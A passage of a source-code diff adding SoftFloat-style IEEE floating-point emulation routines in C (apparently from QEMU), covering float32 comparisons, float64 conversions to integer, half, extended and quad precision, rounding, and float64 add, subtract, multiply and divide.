float32_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + av = float32_val(a); + bv = float32_val(b); + if ( aSign != bSign ) return aSign && ( (uint32_t) ( ( av | bv )<<1 ) != 0 ); + return ( av != bv ) && ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The +| comparison is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_unordered_quiet( float32 a, float32 b STATUS_PARAM ) +{ + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + if ( float32_is_signaling_nan( a ) || float32_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the 32-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. Otherwise, if the conversion overflows, the +| largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int32 float64_to_int32( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint64_t aSig; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( ( aExp == 0x7FF ) && aSig ) aSign = 0; + if ( aExp ) aSig |= LIT64( 0x0010000000000000 ); + shiftCount = 0x42C - aExp; + if ( 0 < shiftCount ) shift64RightJamming( aSig, shiftCount, &aSig ); + return roundAndPackInt32( aSign, aSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the 32-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. +| If `a' is a NaN, the largest positive integer is returned. Otherwise, if +| the conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int32 float64_to_int32_round_to_zero( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint64_t aSig, savedASig; + int32_t z; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( 0x41E < aExp ) { + if ( ( aExp == 0x7FF ) && aSig ) aSign = 0; + goto invalid; + } + else if ( aExp < 0x3FF ) { + if ( aExp || aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + aSig |= LIT64( 0x0010000000000000 ); + shiftCount = 0x433 - aExp; + savedASig = aSig; + aSig >>= shiftCount; + z = (int32_t)aSig; + if ( aSign && (z != 0x80000000)) z = - z; + if ( ( z < 0 ) ^ aSign ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + return aSign ? (int32_t) 0x80000000 : 0x7FFFFFFF; + } + if ( ( aSig<<shiftCount ) != savedASig ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the 16-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. +| If `a' is a NaN, the largest positive integer is returned. Otherwise, if +| the conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int_fast16_t float64_to_int16_round_to_zero(float64 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint64_t aSig, savedASig; + int32 z; + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( 0x40E < aExp ) { + if ( ( aExp == 0x7FF ) && aSig ) { + aSign = 0; + } + goto invalid; + } + else if ( aExp < 0x3FF ) { + if ( aExp || aSig ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return 0; + } + aSig |= LIT64( 0x0010000000000000 ); + shiftCount = 0x433 - aExp; + savedASig = aSig; + aSig >>= shiftCount; + z = (int32)aSig; + if ( aSign ) { + z = - z; + } + if ( ( (int16_t)z < 0 ) ^ aSign ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + return aSign ? (int32_t) 0xffff8000 : 0x7FFF; + } + if ( ( aSig<<shiftCount ) != savedASig ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the 64-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. Otherwise, if the conversion overflows, the +| largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int64 float64_to_int64( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint64_t aSig, aSigExtra; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( aExp ) aSig |= LIT64( 0x0010000000000000 ); + shiftCount = 0x433 - aExp; + if ( shiftCount <= 0 ) { + if ( 0x43E < aExp ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign + || ( ( aExp == 0x7FF ) + && ( aSig != LIT64( 0x0010000000000000 ) ) ) + ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + aSigExtra = 0; + aSig <<= - shiftCount; + } + else { + shift64ExtraRightJamming( aSig, 0, shiftCount, &aSig, &aSigExtra ); + } + return roundAndPackInt64( aSign, aSig, aSigExtra STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the 64-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. +| If `a' is a NaN, the largest positive integer is returned. Otherwise, if +| the conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int64 float64_to_int64_round_to_zero( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint64_t aSig; + int64 z; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( aExp ) aSig |= LIT64( 0x0010000000000000 ); + shiftCount = aExp - 0x433; + if ( 0 <= shiftCount ) { + if ( 0x43E <= aExp ) { + if ( float64_val(a) != LIT64( 0xC3E0000000000000 ) ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign + || ( ( aExp == 0x7FF ) + && ( aSig != LIT64( 0x0010000000000000 ) ) ) + ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + z = aSig<<shiftCount; + } + else { + if ( aExp < 0x3FE ) { + if ( aExp | aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + z = aSig>>( - shiftCount ); + if ( (uint64_t) ( aSig<<( shiftCount & 63 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + } + if ( aSign ) z = - z; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the single-precision floating-point format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float64_to_float32( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint64_t aSig; + uint32_t zSig; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( aExp == 0x7FF ) { + if ( aSig ) return commonNaNToFloat32( float64ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloat32( aSign, 0xFF, 0 ); + } + shift64RightJamming( aSig, 22, &aSig ); + zSig = (uint32_t)aSig; + if ( aExp || zSig ) { + zSig |= 0x40000000; + aExp -= 0x381; + } + return roundAndPackFloat32( aSign, aExp, zSig STATUS_VAR ); + +} + + +/*---------------------------------------------------------------------------- +| Packs the sign `zSign', exponent `zExp', and significand `zSig' into a +| half-precision floating-point value, returning the result. After being +| shifted into the proper positions, the three fields are simply added +| together to form the result. This means that any integer portion of `zSig' +| will be added into the exponent. Since a properly normalized significand +| will have an integer portion equal to 1, the `zExp' input should be 1 less +| than the desired result exponent whenever `zSig' is a complete, normalized +| significand. +*----------------------------------------------------------------------------*/ +static float16 packFloat16(flag zSign, int_fast16_t zExp, uint16_t zSig) +{ + return make_float16( + (((uint32_t)zSign) << 15) + (((uint32_t)zExp) << 10) + zSig); +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and significand `zSig', and returns the proper half-precision floating- +| point value corresponding to the abstract input. Ordinarily, the abstract +| value is simply rounded and packed into the half-precision format, with +| the inexact exception raised if the abstract input cannot be represented +| exactly. However, if the abstract value is too large, the overflow and +| inexact exceptions are raised and an infinity or maximal finite value is +| returned. If the abstract value is too small, the input value is rounded to +| a subnormal number, and the underflow and inexact exceptions are raised if +| the abstract input cannot be represented exactly as a subnormal half- +| precision floating-point number. +| The `ieee' flag indicates whether to use IEEE standard half precision, or +| ARM-style "alternative representation", which omits the NaN and Inf +| encodings in order to raise the maximum representable exponent by one. +| The input significand `zSig' has its binary point between bits 22 +| and 23, which is 13 bits to the left of the usual location. This shifted +| significand must be normalized or smaller. If `zSig' is not normalized, +| `zExp' must be 0; in that case, the result returned is a subnormal number, +| and it must not require rounding. In the usual case that `zSig' is +| normalized, `zExp' must be 1 less than the ``true'' floating-point exponent. +| Note the slightly odd position of the binary point in zSig compared with the +| other roundAndPackFloat functions. This should probably be fixed if we +| need to implement more float16 routines than just conversion. +| The handling of underflow and overflow follows the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float32 roundAndPackFloat16(flag zSign, int_fast16_t zExp, + uint32_t zSig, flag ieee STATUS_PARAM) +{ + int maxexp = ieee ? 29 : 30; + uint32_t mask; + uint32_t increment; + bool rounding_bumps_exp; + bool is_tiny = false; + + /* Calculate the mask of bits of the mantissa which are not + * representable in half-precision and will be lost. + */ + if (zExp < 1) { + /* Will be denormal in halfprec */ + mask = 0x00ffffff; + if (zExp >= -11) { + mask >>= 11 + zExp; + } + } else { + /* Normal number in halfprec */ + mask = 0x00001fff; + } + + switch (STATUS(float_rounding_mode)) { + case float_round_nearest_even: + increment = (mask + 1) >> 1; + if ((zSig & mask) == increment) { + increment = zSig & (increment << 1); + } + break; + case float_round_ties_away: + increment = (mask + 1) >> 1; + break; + case float_round_up: + increment = zSign ? 0 : mask; + break; + case float_round_down: + increment = zSign ? mask : 0; + break; + default: /* round_to_zero */ + increment = 0; + break; + } + + rounding_bumps_exp = (zSig + increment >= 0x01000000); + + if (zExp > maxexp || (zExp == maxexp && rounding_bumps_exp)) { + if (ieee) { + float_raise(float_flag_overflow | float_flag_inexact STATUS_VAR); + return packFloat16(zSign, 0x1f, 0); + } else { + float_raise(float_flag_invalid STATUS_VAR); + return packFloat16(zSign, 0x1f, 0x3ff); + } + } + + if (zExp < 0) { + /* Note that flush-to-zero does not affect half-precision results */ + is_tiny = + (STATUS(float_detect_tininess) == float_tininess_before_rounding) + || (zExp < -1) + || (!rounding_bumps_exp); + } + if (zSig & mask) { + float_raise(float_flag_inexact STATUS_VAR); + if (is_tiny) { + float_raise(float_flag_underflow STATUS_VAR); + } + } + + zSig += increment; + if (rounding_bumps_exp) { + zSig >>= 1; + zExp++; + } + + if (zExp < -10) { + return packFloat16(zSign, 0, 0); + } + if (zExp < 0) { + zSig >>= -zExp; + zExp = 0; + } + return packFloat16(zSign, zExp, zSig >> 13); +} + +static void normalizeFloat16Subnormal(uint32_t aSig, int_fast16_t *zExpPtr, + uint32_t *zSigPtr) +{ + int8_t shiftCount = countLeadingZeros32(aSig) - 21; + *zSigPtr = aSig << shiftCount; + *zExpPtr = 1 - shiftCount; +} + +/* Half precision floats come in two formats: standard IEEE and "ARM" format. + The latter gains extra exponent range by omitting the NaN/Inf encodings. */ + +float32 float16_to_float32(float16 a, flag ieee STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + + aSign = extractFloat16Sign(a); + aExp = extractFloat16Exp(a); + aSig = extractFloat16Frac(a); + + if (aExp == 0x1f && ieee) { + if (aSig) { + return commonNaNToFloat32(float16ToCommonNaN(a STATUS_VAR) STATUS_VAR); + } + return packFloat32(aSign, 0xff, 0); + } + if (aExp == 0) { + if (aSig == 0) { + return packFloat32(aSign, 0, 0); + } + + normalizeFloat16Subnormal(aSig, &aExp, &aSig); + aExp--; + } + return packFloat32( aSign, aExp + 0x70, aSig << 13); +} + +float16 float32_to_float16(float32 a, flag ieee STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( aExp == 0xFF ) { + if (aSig) { + /* Input is a NaN */ + if (!ieee) { + float_raise(float_flag_invalid STATUS_VAR); + return packFloat16(aSign, 0, 0); + } + return commonNaNToFloat16( + float32ToCommonNaN(a STATUS_VAR) STATUS_VAR); + } + /* Infinity */ + if (!ieee) { + float_raise(float_flag_invalid STATUS_VAR); + return packFloat16(aSign, 0x1f, 0x3ff); + } + return packFloat16(aSign, 0x1f, 0); + } + if (aExp == 0 && aSig == 0) { + return packFloat16(aSign, 0, 0); + } + /* Decimal point between bits 22 and 23. Note that we add the 1 bit + * even if the input is denormal; however this is harmless because + * the largest possible single-precision denormal is still smaller + * than the smallest representable half-precision denormal, and so we + * will end up ignoring aSig and returning via the "always return zero" + * codepath. + */ + aSig |= 0x00800000; + aExp -= 0x71; + + return roundAndPackFloat16(aSign, aExp, aSig, ieee STATUS_VAR); +} + +float64 float16_to_float64(float16 a, flag ieee STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + + aSign = extractFloat16Sign(a); + aExp = extractFloat16Exp(a); + aSig = extractFloat16Frac(a); + + if (aExp == 0x1f && ieee) { + if (aSig) { + return commonNaNToFloat64( + float16ToCommonNaN(a STATUS_VAR) STATUS_VAR); + } + return packFloat64(aSign, 0x7ff, 0); + } + if (aExp == 0) { + if (aSig == 0) { + return packFloat64(aSign, 0, 0); + } + + normalizeFloat16Subnormal(aSig, &aExp, &aSig); + aExp--; + } + return packFloat64(aSign, aExp + 0x3f0, ((uint64_t)aSig) << 42); +} + +float16 float64_to_float16(float64 a, flag ieee STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp; + uint64_t aSig; + uint32_t zSig; + + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac(a); + aExp = extractFloat64Exp(a); + aSign = extractFloat64Sign(a); + if (aExp == 0x7FF) { + if (aSig) { + /* Input is a NaN */ + if (!ieee) { + float_raise(float_flag_invalid STATUS_VAR); + return packFloat16(aSign, 0, 0); + } + return commonNaNToFloat16( + float64ToCommonNaN(a STATUS_VAR) STATUS_VAR); + } + /* Infinity */ + if (!ieee) { + float_raise(float_flag_invalid STATUS_VAR); + return packFloat16(aSign, 0x1f, 0x3ff); + } + return packFloat16(aSign, 0x1f, 0); + } + shift64RightJamming(aSig, 29, &aSig); + zSig = (uint32_t)aSig; + if (aExp == 0 && zSig == 0) { + return packFloat16(aSign, 0, 0); + } + /* Decimal point between bits 22 and 23. Note that we add the 1 bit + * even if the input is denormal; however this is harmless because + * the largest possible single-precision denormal is still smaller + * than the smallest representable half-precision denormal, and so we + * will end up ignoring aSig and returning via the "always return zero" + * codepath. + */ + zSig |= 0x00800000; + aExp -= 0x3F1; + + return roundAndPackFloat16(aSign, aExp, zSig, ieee STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the extended double-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 float64_to_floatx80( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint64_t aSig; + + a = float64_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( aExp == 0x7FF ) { + if ( aSig ) return commonNaNToFloatx80( float64ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloatx80( aSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloatx80( aSign, 0, 0 ); + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + } + return + packFloatx80( + aSign, aExp + 0x3C00, ( aSig | LIT64( 0x0010000000000000 ) )<<11 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the double-precision floating-point value +| `a' to the quadruple-precision floating-point format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float64_to_float128( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint64_t aSig, zSig0, zSig1; + + a = float64_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( aExp == 0x7FF ) { + if ( aSig ) return commonNaNToFloat128( float64ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloat128( aSign, 0x7FFF, 0, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat128( aSign, 0, 0, 0 ); + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + --aExp; + } + shift128Right( aSig, 0, 4, &zSig0, &zSig1 ); + return packFloat128( aSign, aExp + 0x3C00, zSig0, zSig1 ); + +} + +/*---------------------------------------------------------------------------- +| Rounds the double-precision floating-point value `a' to an integer, and +| returns the result as a double-precision floating-point value. The +| operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_round_to_int( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint64_t lastBitMask, roundBitsMask; + uint64_t z; + a = float64_squash_input_denormal(a STATUS_VAR); + + aExp = extractFloat64Exp( a ); + if ( 0x433 <= aExp ) { + if ( ( aExp == 0x7FF ) && extractFloat64Frac( a ) ) { + return propagateFloat64NaN( a, a STATUS_VAR ); + } + return a; + } + if ( aExp < 0x3FF ) { + if ( (uint64_t) ( float64_val(a)<<1 ) == 0 ) return a; + STATUS(float_exception_flags) |= float_flag_inexact; + aSign = extractFloat64Sign( a ); + switch ( STATUS(float_rounding_mode) ) { + case float_round_nearest_even: + if ( ( aExp == 0x3FE ) && extractFloat64Frac( a ) ) { + return packFloat64( aSign, 0x3FF, 0 ); + } + break; + case float_round_ties_away: + if (aExp == 0x3FE) { + return packFloat64(aSign, 0x3ff, 0); + } + break; + case float_round_down: + return make_float64(aSign ? LIT64( 0xBFF0000000000000 ) : 0); + case float_round_up: + return make_float64( + aSign ? LIT64( 0x8000000000000000 ) : LIT64( 0x3FF0000000000000 )); + } + return packFloat64( aSign, 0, 0 ); + } + lastBitMask = 1; + lastBitMask <<= 0x433 - aExp; + roundBitsMask = lastBitMask - 1; + z = float64_val(a); + switch (STATUS(float_rounding_mode)) { + case float_round_nearest_even: + z += lastBitMask >> 1; + if ((z & roundBitsMask) == 0) { + z &= ~lastBitMask; + } + break; + case float_round_ties_away: + z += lastBitMask >> 1; + break; + case float_round_to_zero: + break; + case float_round_up: + if (!extractFloat64Sign(make_float64(z))) { + z += roundBitsMask; + } + break; + case float_round_down: + if (extractFloat64Sign(make_float64(z))) { + z += roundBitsMask; + } + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + z &= ~ roundBitsMask; + if ( z != float64_val(a) ) + STATUS(float_exception_flags) |= float_flag_inexact; + return make_float64(z); + +} + +float64 float64_trunc_to_int( float64 a STATUS_PARAM) +{ + int oldmode; + float64 res; + oldmode = STATUS(float_rounding_mode); + STATUS(float_rounding_mode) = float_round_to_zero; + res = float64_round_to_int(a STATUS_VAR); + STATUS(float_rounding_mode) = oldmode; + return res; +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the absolute values of the double-precision +| floating-point values `a' and `b'. If `zSign' is 1, the sum is negated +| before being returned. `zSign' is ignored if the result is a NaN. +| The addition is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float64 addFloat64Sigs( float64 a, float64 b, flag zSign STATUS_PARAM ) +{ + int_fast16_t aExp, bExp, zExp; + uint64_t aSig, bSig, zSig; + int_fast16_t expDiff; + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + bSig = extractFloat64Frac( b ); + bExp = extractFloat64Exp( b ); + expDiff = aExp - bExp; + aSig <<= 9; + bSig <<= 9; + if ( 0 < expDiff ) { + if ( aExp == 0x7FF ) { + if ( aSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + --expDiff; + } + else { + bSig |= LIT64( 0x2000000000000000 ); + } + shift64RightJamming( bSig, expDiff, &bSig ); + zExp = aExp; + } + else if ( expDiff < 0 ) { + if ( bExp == 0x7FF ) { + if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + return packFloat64( zSign, 0x7FF, 0 ); + } + if ( aExp == 0 ) { + ++expDiff; + } + else { + aSig |= LIT64( 0x2000000000000000 ); + } + shift64RightJamming( aSig, - expDiff, &aSig ); + zExp = bExp; + } + else { + if ( aExp == 0x7FF ) { + if ( aSig | bSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + return a; + } + if ( aExp == 0 ) { + if (STATUS(flush_to_zero)) { + if (aSig | bSig) { + float_raise(float_flag_output_denormal STATUS_VAR); + } + return packFloat64(zSign, 0, 0); + } + return packFloat64( zSign, 0, ( aSig + bSig )>>9 ); + } + zSig = LIT64( 0x4000000000000000 ) + aSig + bSig; + zExp = aExp; + goto roundAndPack; + } + aSig |= LIT64( 0x2000000000000000 ); + zSig = ( aSig + bSig )<<1; + --zExp; + if ( (int64_t) zSig < 0 ) { + zSig = aSig + bSig; + ++zExp; + } + roundAndPack: + return roundAndPackFloat64( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the absolute values of the double- +| precision floating-point values `a' and `b'. If `zSign' is 1, the +| difference is negated before being returned. `zSign' is ignored if the +| result is a NaN. The subtraction is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float64 subFloat64Sigs( float64 a, float64 b, flag zSign STATUS_PARAM ) +{ + int_fast16_t aExp, bExp, zExp; + uint64_t aSig, bSig, zSig; + int_fast16_t expDiff; + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + bSig = extractFloat64Frac( b ); + bExp = extractFloat64Exp( b ); + expDiff = aExp - bExp; + aSig <<= 10; + bSig <<= 10; + if ( 0 < expDiff ) goto aExpBigger; + if ( expDiff < 0 ) goto bExpBigger; + if ( aExp == 0x7FF ) { + if ( aSig | bSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + if ( aExp == 0 ) { + aExp = 1; + bExp = 1; + } + if ( bSig < aSig ) goto aBigger; + if ( aSig < bSig ) goto bBigger; + return packFloat64( STATUS(float_rounding_mode) == float_round_down, 0, 0 ); + bExpBigger: + if ( bExp == 0x7FF ) { + if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + return packFloat64( zSign ^ 1, 0x7FF, 0 ); + } + if ( aExp == 0 ) { + ++expDiff; + } + else { + aSig |= LIT64( 0x4000000000000000 ); + } + shift64RightJamming( aSig, - expDiff, &aSig ); + bSig |= LIT64( 0x4000000000000000 ); + bBigger: + zSig = bSig - aSig; + zExp = bExp; + zSign ^= 1; + goto normalizeRoundAndPack; + aExpBigger: + if ( aExp == 0x7FF ) { + if ( aSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + --expDiff; + } + else { + bSig |= LIT64( 0x4000000000000000 ); + } + shift64RightJamming( bSig, expDiff, &bSig ); + aSig |= LIT64( 0x4000000000000000 ); + aBigger: + zSig = aSig - bSig; + zExp = aExp; + normalizeRoundAndPack: + --zExp; + return normalizeRoundAndPackFloat64( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the double-precision floating-point values `a' +| and `b'. The operation is performed according to the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_add( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + if ( aSign == bSign ) { + return addFloat64Sigs( a, b, aSign STATUS_VAR ); + } + else { + return subFloat64Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the double-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_sub( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + if ( aSign == bSign ) { + return subFloat64Sigs( a, b, aSign STATUS_VAR ); + } + else { + return addFloat64Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the double-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_mul( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int_fast16_t aExp, bExp, zExp; + uint64_t aSig, bSig, zSig0, zSig1; + + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + bSig = extractFloat64Frac( b ); + bExp = extractFloat64Exp( b ); + bSign = extractFloat64Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FF ) { + if ( aSig || ( ( bExp == 0x7FF ) && bSig ) ) { + return propagateFloat64NaN( a, b STATUS_VAR ); + } + if ( ( bExp | bSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + return packFloat64( zSign, 0x7FF, 0 ); + } + if ( bExp == 0x7FF ) { + if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + if ( ( aExp | aSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + return packFloat64( zSign, 0x7FF, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat64( zSign, 0, 0 ); + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) return packFloat64( zSign, 0, 0 ); + normalizeFloat64Subnormal( bSig, &bExp, &bSig ); + } + zExp = aExp + bExp - 0x3FF; + aSig = ( aSig | LIT64( 0x0010000000000000 ) )<<10; + bSig = ( bSig | LIT64( 0x0010000000000000 ) )<<11; + mul64To128( aSig, bSig, &zSig0, &zSig1 ); + zSig0 |= ( zSig1 != 0 ); + if ( 0 <= (int64_t) ( zSig0<<1 ) ) { + zSig0 <<= 1; + --zExp; + } + return roundAndPackFloat64( zSign, zExp, zSig0 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of dividing the double-precision floating-point value `a' +| by the corresponding value `b'. The operation is performed according to +| the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_div( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int_fast16_t aExp, bExp, zExp; + uint64_t aSig, bSig, zSig; + uint64_t rem0, rem1; + uint64_t term0, term1; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + bSig = extractFloat64Frac( b ); + bExp = extractFloat64Exp( b ); + bSign = extractFloat64Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FF ) { + if ( aSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + if ( bExp == 0x7FF ) { + if ( 